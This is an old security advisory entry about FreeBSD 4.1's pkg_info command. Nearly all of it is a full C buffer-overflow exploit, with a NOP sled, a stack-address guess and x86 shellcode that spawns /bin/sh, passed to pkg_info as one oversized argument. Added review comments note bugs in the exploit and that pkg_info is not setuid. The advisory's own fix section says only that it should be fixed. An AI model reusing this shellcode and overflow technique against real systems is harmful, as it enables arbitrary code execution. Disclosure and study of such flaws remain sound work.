10th Feb 2001 [SBWID-181]
COMMAND
	    pkginfo
SYSTEMS AFFECTED
	    FreeBSD 4.1
PROBLEM
	    'visi0n' posted the following.
	
	    /*
	     *	FreeBSD 4.1 x86 pkg_info exploit.
	     *	anthrax# ./AUX-pkg_info 4301 2000
	     *	Author: visi0n.
	     *	AUX TECHNOLOGIES BRASIL.
	     *	Comments: This is for fun, because pkg_info isnt suid.
	     */
	    #include <stdio.h>
	    #include <string.h>
	    /* Default amount subtracted from get_esp(); argv[2] overrides it in main(). */
	    #define OFFSET			0
	    /* Default size of the single argument handed to pkg_info; argv[1] overrides it. */
	    #define BUFFER_SIZE		4301
	    /* x86 NOP opcode used to pad the first half of the buffer. */
	    #define NOP			0x90
	    /*
	     * Raw machine-code payload. Only the readable tail "/bin/sh.-c.sh" is
	     * self-explanatory; the opcode bytes in front of it are not annotated
	     * here. main() sizes and centres it with strlen(), so the array must
	     * not contain an embedded NUL (it currently does not).
	     */
	    char shellcode[]=
	    "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
	    "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
	    "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
	    "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
	    "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
	    "\x02\x02\x02/bin/sh.-c.sh";
	    /*
	     * Returns the current stack pointer. There is no C return statement:
	     * the function copies %esp into %eax and relies on %eax being the x86
	     * integer return register. Reading the result of a non-void function
	     * that falls off its end is undefined behaviour in C, so this is
	     * i386-specific and may break under optimisation.
	     */
	    unsigned long get_esp()
	    {
		    __asm__("movl %esp,%eax");
	    }
	    /*
	     * Builds one oversized argument string and execs pkg_info with it.
	     *   argv[1]  buffer size in bytes (default BUFFER_SIZE)
	     *   argv[2]  offset subtracted from the current stack pointer (default OFFSET)
	     *
	     * Review notes:
	     *  - `void main` is non-standard, and atoi(), malloc() and execl() are
	     *    called without <stdlib.h>/<unistd.h>, so they are implicitly declared.
	     *  - malloc() is unchecked; a failed allocation is written through.
	     *  - The first fill loop stores a 4-byte long per step while i < bsize,
	     *    so a bsize that is not a multiple of 4 (the default 4301 included)
	     *    overruns the heap buffer by up to 3 bytes.
	     *  - As the header comment says, pkg_info is not setuid, so whatever the
	     *    argument triggers inside pkg_info runs with the invoker's own uid.
	     */
	    void main(int argc, char *argv[])
	    {
		    char *buff, *ptr;
		    long *addr_ptr, addr;
		    int offset = OFFSET, bsize = BUFFER_SIZE;
		    int i;
		    if (argc > 1) bsize = atoi(argv[1]);
		    if (argc > 2) offset = atoi(argv[2]);
		    buff = malloc(bsize);
		    addr = get_esp() - offset;
		    /* "%x" with a long argument: mismatched, harmless only where long is 32-bit */
		    printf("0x%x\n", addr);
		    ptr = buff;
		    addr_ptr = (long *)ptr;
		    /* 1) fill the whole buffer with the chosen address (assumes sizeof(long) == 4) */
		    for (i = 0; i < bsize; i += 4)
			    *(addr_ptr++) = addr;
		    /* 2) overwrite the first half with NOP bytes */
		    for (i = 0; i < bsize/2; i++)
			    buff[i] = NOP;
		    /* 3) copy the payload so that it is centred on the middle of the buffer */
		    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
		    for (i = 0; i < strlen(shellcode); i++)
			    *(ptr++) = shellcode[i];
		    /* NUL-terminate: execl() passes buff as a C string */
		    buff[bsize -1] = '\0';
		    /* "%d" with a size_t argument: mismatched format specifier */
		    printf("%d\n", strlen(buff));
		    /* the terminating 0 should be (char *)0 / NULL in a variadic call */
		    execl("/usr/sbin/pkg_info", "pkg_info", buff, 0);
	    }
	
SOLUTION
	    It should be fixed.
	
